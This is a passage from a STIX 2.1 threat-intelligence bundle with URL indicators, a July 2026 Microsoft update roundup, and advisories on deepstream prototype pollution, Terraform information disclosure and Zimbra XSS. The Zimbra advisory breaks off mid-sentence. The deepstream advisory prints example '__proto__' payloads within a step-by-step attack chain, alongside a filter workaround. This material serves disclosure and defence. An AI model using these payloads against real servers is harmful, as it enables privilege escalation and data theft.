      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--aecd7e10-d435-5742-a5a8-233c795afa40",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--35346df7-cd8b-58b3-9bff-e0bdce78deb3"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--55f3dff4-d214-5d6c-89ea-8cee16559405",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://microsoft.com/devicelogin",
      "pattern": "[url:value = 'https://microsoft.com/devicelogin']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8c3f34c7-30d7-57a9-a1ea-76fb36a1e83c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--55f3dff4-d214-5d6c-89ea-8cee16559405"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a6707b77-eb5d-5098-b7e0-f8fea44a97f6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://login.microsoftonline.com/{tenant}/oauth2/v2.0/devicecode",
      "pattern": "[url:value = 'https://login.microsoftonline.com/{tenant}/oauth2/v2.0/devicecode']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--31584af0-7c7e-5b8d-904c-0855df52d75b",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--a6707b77-eb5d-5098-b7e0-f8fea44a97f6"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--541e16ee-1760-56ba-9b79-205269084fc7",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://login.microsoftonline.com/{tenant}/oauth2/v2.0/token",
      "pattern": "[url:value = 'https://login.microsoftonline.com/{tenant}/oauth2/v2.0/token']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6f05332d-144e-5e89-80b7-52c928541f6c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--541e16ee-1760-56ba-9b79-205269084fc7"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--f8a99d05-fafe-53bc-a5f5-cd689a52a19e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://2017.zeronights.org/wp-content/uploads/materials/ZN17_Kheirkhabarov_Hunting_for_Credentials_Dumping_in_Windows_Environment.pdf",
      "pattern": "[url:value = 'https://2017.zeronights.org/wp-content/uploads/materials/ZN17_Kheirkhabarov_Hunting_for_Credentials_Dumping_in_Windows_Environment.pdf']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--f59a69a0-322f-53dc-818a-65ee15f58c15",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--f8a99d05-fafe-53bc-a5f5-cd689a52a19e"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--ae3742f3-2918-5213-9c3d-9bde5ddd284f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://twitter.com/pr0xylife/status/1585612370441031680?s=46\u0026t=Dc3CJi4AnM-8rNoacLbScg",
      "pattern": "[url:value = 'https://twitter.com/pr0xylife/status/1585612370441031680?s=46\u0026t=Dc3CJi4AnM-8rNoacLbScg']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--6a5b2385-8271-5e5e-8777-136caa0c906e",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--ae3742f3-2918-5213-9c3d-9bde5ddd284f"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--5497f7f2-b232-5434-be81-a4449d780b01",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/",
      "pattern": "[url:value = 'https://thedfirreport.com/2023/06/12/a-truly-graceful-wipe-out/']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--8e788b6c-d2aa-5017-b51d-0ed592050869",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--5497f7f2-b232-5434-be81-a4449d780b01"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--6470276b-34e1-57ef-a826-742aa376fe5c",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/malware/qakbot/qbot_wermgr2/sysmon_wermgr2.log",
      "pattern": "[url:value = 'https://media.githubusercontent.com/media/splunk/attack_data/master/datasets/malware/qakbot/qbot_wermgr2/sysmon_wermgr2.log']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--25c1be92-aa33-577b-8fca-ecd40bb355d3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--6470276b-34e1-57ef-a826-742aa376fe5c"
    },
    {
      "type": "indicator",
      "spec_version": "2.1",
      "id": "indicator--a61c99da-d932-526e-8c6a-6eae9d5b0d5f",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "url: https://github.com/its-a-feature/bifrost",
      "pattern": "[url:value = 'https://github.com/its-a-feature/bifrost']",
      "pattern_type": "stix",
      "valid_from": "2026-07-03T10:31:01Z"
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--a0898fb3-07dd-50b1-b9fa-c6c8be5e7617",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "target_ref": "indicator--a61c99da-d932-526e-8c6a-6eae9d5b0d5f"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--dd9f6ced-8dec-5601-a8e2-16a070a35ee8",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Microsoft Security Updates — July 2026",
      "description": "## Overview\n\nAggregated Microsoft security advisories for July 2026. CVEs from this cycle are folded\ninto the list below as they are published.\n\n## Recommendation\n\nReview affected products and apply Microsoft's July 2026 security updates.\n",
      "published": "2026-07-03T10:31:01Z",
      "labels": [
        "roundup"
      ],
      "object_refs": [
        "indicator--99eaa171-a48d-5425-b11c-344aabf5d45c",
        "indicator--b5b6e70d-6f9a-5379-9f4a-a87c1cbc8bfc",
        "indicator--9497002e-6169-58bc-acbe-1a9b8eedea58",
        "indicator--ade583a7-d0b6-5e42-b002-ea0a0f9d4ab5",
        "indicator--a1469590-9a8c-544a-9933-d46973047233",
        "indicator--bda38f91-cb5e-56bf-ab75-d73ac0dfb1cc",
        "indicator--3854d65d-8e73-5c6d-bd55-8c73dd0ae4ff",
        "indicator--2ad8d572-d47d-5633-88fd-8be3d9c40395",
        "indicator--26c5c80d-6bfe-5b20-80f9-11431f5f6cc5",
        "indicator--508c9b85-b0f7-5a40-b327-9196b1d99043",
        "indicator--0df8a8ba-a579-5ad8-9027-e1ab1759716d",
        "indicator--53b08a03-5197-5d35-a9ce-515971533604",
        "indicator--51b2eab1-fe66-5c8c-aefe-db3a4dd1fd30",
        "indicator--531f6dd3-2d74-57d0-949a-1d1da9e8ec66",
        "indicator--5edcdd9f-155e-50a0-bf86-5a1f32b8a272",
        "indicator--22a47b60-8865-535a-8f14-e915a8128bb1",
        "indicator--35126508-6497-5438-aaa9-833e8c34a868",
        "indicator--e682bb6c-4c89-5049-8fc4-4927cb35c8f4",
        "indicator--59499f6c-9e51-5ba8-a11b-9abaa8e90a43",
        "indicator--cc422e5b-e03b-509b-8f23-1b671f9e4290",
        "indicator--94875413-4d87-592e-b755-5bab0a304c12",
        "indicator--439f0e02-4eb9-5ccd-91ef-236e6500886e",
        "indicator--35346df7-cd8b-58b3-9bff-e0bdce78deb3",
        "indicator--55f3dff4-d214-5d6c-89ea-8cee16559405",
        "indicator--a6707b77-eb5d-5098-b7e0-f8fea44a97f6",
        "indicator--541e16ee-1760-56ba-9b79-205269084fc7",
        "indicator--f8a99d05-fafe-53bc-a5f5-cd689a52a19e",
        "indicator--ae3742f3-2918-5213-9c3d-9bde5ddd284f",
        "indicator--5497f7f2-b232-5434-be81-a4449d780b01",
        "indicator--6470276b-34e1-57ef-a826-742aa376fe5c",
        "indicator--a61c99da-d932-526e-8c6a-6eae9d5b0d5f"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/powershell_pinvoke_process_injection_api_chain.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/registry_keys_used_for_persistence.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/executables_or_script_creation_in_temp_path.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/windows_disable_or_modify_tools_via_taskkill.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/windows_powershell_cryptography_namespace.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/windows_process_injection_remote_thread.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/windows_suspicious_process_file_path.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/windows_unsecured_outlook_credentials_access_in_registry.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/windows_system_network_connections_discovery_netsh.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/powershell_environment_variable_execution.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/powershell_loading_dotnet_into_memory_via_reflection.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/powershell_processing_stream_of_data.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/powershell_remove_windows_defender_directory.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/powershell_windows_defender_exclusion_commands.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/windows_powershell_import_applocker_policy.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/windows_powershell_logoff_user_via_quser.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/windows/credential_access_protected_storage_service_access.toml"
        },
        {
          "source_name": "reference",
          "url": "https://sploitus.com/exploit?id=816BFD0D-57FA-5C9C-B54C-3F0F88BD2C84\u0026utm_source=rss\u0026utm_medium=rss"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/windows/initial_access_mssql_potential_sql_injection.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/azure/collection_graph_email_access_by_unusual_public_client_via_graph.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/network/command_and_control_rdp_remote_desktop_protocol_from_the_internet.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/windows/command_and_control_openssh_reverse_port_forwarding.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/azure/initial_access_aad_graph_unusual_asn.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/network/initial_access_rpc_remote_procedure_call_from_the_internet.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/network/initial_access_smb_windows_file_sharing_activity_to_the_internet.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_amsi_bypass_rpc_ndrclientcall.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/o365/initial_access_teams_rogue_helpdesk_chat.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/windows/command_and_control_quick_assist_fullcontrol_sharing.toml"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-56645"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57985"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57987"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57988"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57992"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57993"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58282"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58283"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58522"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57974"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57977"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57981"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-57986"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58276"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58278"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58285"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58286"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58289"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58293"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58294"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58298"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58300"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-58291"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-57975"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-57983"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-57984"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-57991"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58284"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58287"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58288"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58290"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58292"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58295"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58296"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58297"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-58299"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/windows/command_and_control_dns_tunneling_nslookup.toml"
        },
        {
          "source_name": "reference",
          "url": "https://securelist.com/microsoft-device-code-phishing-attack/120350/"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/create_remote_thread_in_shell_application.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/create_remote_thread_into_lsass.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/powershell_remote_thread_to_known_windows_process.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/windows_uncommon_remote_thread_creation_in_browser_process.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/splunk/security_content/blob/main/detections/endpoint/petitpotam_suspicious_kerberos_tgt_request.yml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/windows/defense_evasion_untrusted_driver_loaded.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/windows/lateral_movement_credential_access_kerberos_correlation.toml"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/elastic/detection-rules/blob/main/rules/integrations/azure/initial_access_entra_id_oauth_device_code_phishing_tycoon_aitm.toml"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-55952"
        },
        {
          "source_name": "reference",
          "url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-54886"
        }
      ],
      "confidence": 80
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--8fc1d6d6-b1da-5334-98f0-dcf1ea8100d6",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Exploitation for Privilege Escalation",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1212",
          "url": "https://attack.mitre.org/techniques/T1212"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--bf6210d9-2ed6-55cf-b9bf-5d898be6c73a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--cdbbaa7f-a479-5be1-a9b0-548cc19cd8ff",
      "target_ref": "attack-pattern--8fc1d6d6-b1da-5334-98f0-dcf1ea8100d6"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--cdbbaa7f-a479-5be1-a9b0-548cc19cd8ff",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Deepstream Server Prototype Pollution (CVE-2026-49252) Allows Privilege Escalation",
      "description": "## Overview\n\nThe deepstream server, specifically versions up to 10.0.4, is affected by a critical prototype pollution vulnerability, identified as CVE-2026-49252. This flaw allows an authenticated attacker, who possesses write permissions to any record within the deepstream system, to potentially escalate their privileges. Prototype pollution can lead to the modification of fundamental JavaScript object prototypes, which can then be leveraged to alter application logic, bypass security controls, or achieve arbitrary code execution, ultimately compromising server integrity. The vulnerability is present in the `npm/@deepstream/server` package. Developers are strongly urged to upgrade to version 10.0.5 or implement the recommended workaround to mitigate this risk, ensuring the security of their deepstream deployments.\n\n## Attack Chain\n\n1.  **Initial Access \u0026 Authentication**: An attacker obtains valid credentials for an authenticated user account with write permissions to at least one data record within the deepstream server.\n2.  **Identify Writeable Record**: The attacker identifies a specific data record within the deepstream server that their authenticated user account has permissions to modify.\n3.  **Craft Malicious Payload**: The attacker constructs a data modification message, such as a `SET` operation, targeting the identified record. This message includes a data path or key containing the string `__proto__`, `constructor`, or `prototype` (e.g., `{\"someField.__proto__.isAdmin\": true}` or `{\"data\": {\"__proto__\": {\"isAdmin\": true}}}`).\n4.  **Send Malicious Message**: The crafted message is sent to the vulnerable deepstream server through its API or client interface. This might occur via an HTTP request body or, in some cases, via URI components.\n5.  **Prototype Pollution Trigger**: The deepstream server processes the incoming message. Due to the prototype pollution vulnerability (CVE-2026-49252), the server improperly handles the special prototype path component within the message, leading to the modification of the `Object.prototype` or a similar base object prototype in the server's JavaScript environment.\n6.  **Privilege Escalation**: The attacker leverages the polluted prototype to inject or modify properties (e.g., `isAdmin` flags, internal configuration settings, or references to executable functions) that are subsequently used by other parts of the server application.\n7.  **Impact Fulfillment**: Through this manipulation, the attacker successfully elevates their own privileges within the deepstream server, potentially gaining administrative control, accessing sensitive data, or executing arbitrary commands within the server's context.\n\n## Impact\n\nThe successful exploitation of CVE-2026-49252 can lead to severe consequences, primarily privilege escalation. Any authenticated user with write permissions to any record can elevate their privileges, potentially gaining administrative access over the deepstream server. This could result in complete compromise of the data managed by deepstream, unauthorized access to sensitive information, arbitrary code execution on the server, and disruption of services. While no specific victim counts are provided, all deepstream server instances running vulnerable versions (up to 10.0.4) are at risk, necessitating immediate action to prevent broad compromise.\n\n## Recommendation\n\n*   Upgrade the `@deepstream/server` package to version `10.0.5` immediately to patch CVE-2026-49252.\n*   Implement the recommended workaround by filtering all incoming messages containing the strings `__proto__`, `constructor`, or `prototype` in their path before they reach the deepstream server's message pipeline.\n*   Deploy the Sigma rule below to your SIEM to detect attempts to exploit this vulnerability against webserver logs by monitoring URI paths and query parameters.\n",
      "published": "2026-07-03T10:25:24Z",
      "labels": [
        "prototype-pollution",
        "vulnerability",
        "privilege-escalation",
        "deepstream",
        "npm"
      ],
      "object_refs": [
        "attack-pattern--8fc1d6d6-b1da-5334-98f0-dcf1ea8100d6"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://github.com/advisories/GHSA-9v98-6g37-x9g6"
        },
        {
          "source_name": "reference",
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-49252"
        },
        {
          "source_name": "reference",
          "url": "https://github.com/deepstreamIO/deepstream.io/commit/54b8e29"
        }
      ],
      "confidence": 95
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Data from Cloud Storage",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1530",
          "url": "https://attack.mitre.org/techniques/T1530"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--b24e2063-d689-5a23-bac2-4ad153e6b4a3",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--72664960-dd50-5080-8dee-623bb08303a0",
      "target_ref": "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--72664960-dd50-5080-8dee-623bb08303a0",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Hashicorp Terraform: Information Disclosure Vulnerability",
      "description": "## Overview\n\nA recently identified vulnerability in Hashicorp Terraform could enable a remote, authenticated attacker to disclose sensitive information. While specific details about the nature of the information are not yet publicly available, such vulnerabilities typically expose configuration data, secret variables, or internal system details. This exposure could be leveraged by an attacker to gain further access, escalate privileges, or move laterally within an environment, especially if the exposed information includes credentials, API keys, or infrastructure topology. The vulnerability requires authentication, meaning an attacker would first need to compromise legitimate user credentials to exploit this flaw. Organizations leveraging Terraform for infrastructure management should prioritize addressing this issue to prevent potential data breaches and compromise of their cloud or on-premise resources.\n\n## Impact\n\nThe primary impact of this information disclosure vulnerability is the potential exposure of confidential data managed or configured by Hashicorp Terraform. This could include cloud provider credentials, API tokens, sensitive environment variables, infrastructure-as-code definitions, and other proprietary operational data. If exploited, an attacker could use this information to gain unauthorized access to cloud accounts, compromise critical infrastructure, or perform further malicious activities, potentially leading to significant financial losses, service disruptions, and reputational damage. While no specific victim count or targeted sectors are mentioned, any organization using affected Terraform versions is at risk.\n\n## Recommendation\n\n*   Prioritize patching Hashicorp Terraform to the latest secure version to remediate the vulnerability referenced in the BSI advisory (WID-SEC-2026-2213).\n*   Implement strong authentication mechanisms, including multi-factor authentication (MFA), for all Terraform users and service accounts to mitigate the risk posed by the \"authenticated attacker\" requirement.\n*   Regularly audit Terraform configurations and state files for sensitive data, ensuring secrets are managed securely outside of version control where possible.\n*   Monitor access logs for unusual activity related to Terraform, especially from authenticated users, that might indicate attempted exploitation of the vulnerability.\n",
      "published": "2026-07-07T08:40:37Z",
      "labels": [
        "information-disclosure",
        "vulnerability",
        "terraform",
        "hashicorp"
      ],
      "object_refs": [
        "attack-pattern--3866e24b-251c-5409-b390-26f7184d1897"
      ],
      "external_references": [
        {
          "source_name": "reference",
          "url": "https://wid.cert-bund.de/portal/wid/securityadvisory?name=WID-SEC-2026-2213"
        }
      ],
      "confidence": 60
    },
    {
      "type": "attack-pattern",
      "spec_version": "2.1",
      "id": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Command and Scripting Interpreter",
      "external_references": [
        {
          "source_name": "mitre-attack",
          "external_id": "T1059",
          "url": "https://attack.mitre.org/techniques/T1059"
        }
      ]
    },
    {
      "type": "relationship",
      "spec_version": "2.1",
      "id": "relationship--54caa16d-2f11-500a-9750-bb1cd9d3457a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "relationship_type": "uses",
      "source_ref": "report--40e94cad-57ea-5a0b-88af-d138b06bd94a",
      "target_ref": "attack-pattern--e6e63efe-42b5-57bd-b4b7-a8415ab979eb"
    },
    {
      "type": "report",
      "spec_version": "2.1",
      "id": "report--40e94cad-57ea-5a0b-88af-d138b06bd94a",
      "created": "2026-07-09T17:20:22Z",
      "modified": "2026-07-09T17:20:22Z",
      "name": "Synacor Zimbra Classic Web Client XSS Vulnerability",
      "description": "## Overview\n\nA critical Cross-Site Scripting (XSS) vulnerability has been identified in the Synacor Zimbra Classic Web Client, allowing an unauthenticated remote attacker to inject and execute arbitrary malicious scripts within a victim's web browser. This flaw, reported by the German Federal Office for Information Security (BSI), enables attackers to bypass security controls by leveraging the trusted context of the vulnerable web application. Exploitation can lead to various severe consequences, including the theft of sensitive user data, session hijacking, or defacement of the affected web pages. The vulnerability poses a significant risk to organizations using the Zimbra Classic Web Client, as it can be leveraged for highly effective phishing campaigns or to gain unauthorized access to user accounts and internal resources. Defenders should prioritize patching and monitoring for indicators of XSS exploitation.\n\n## Attack Chain\n\n1.  Attacker identifies a vulnerable input field or URL parameter within the Synacor Zimbra Classic Web Client that reflects user-supplied data without adequate sanitization.\n2.  The attacker crafts a malicious payload containing JavaScript code (e.g., designed to steal cookies or redirect users) and embeds it into the vulnerable application via a specially constructed URL or a manipulated form submission.\n3.  The crafted URL or link, which appears legitimate, is then delivered to a target user, typically through a phishing email, instant message, or other communication channels.\n4.  The victim user clicks the malicious link while logged into their Zimbra Classic Web Client session, causing their browser to send a request to the vulnerable application.\n5.  The Zimbra Classic Web Client processes the request, inadvertently incorporating the attacker's malicious JavaScript code into the HTML response presented to the victim.\n6.  The victim's web browser renders the page, executing the malicious JavaScript code in the context of the legitimate Zimbra domain, leading to the compromise of the user's session or unauthorized actions.\n\n## Impact\n\nSuccessful exploitation of this XSS vulnerability can have severe consequences, including session hijacking, where an attacker 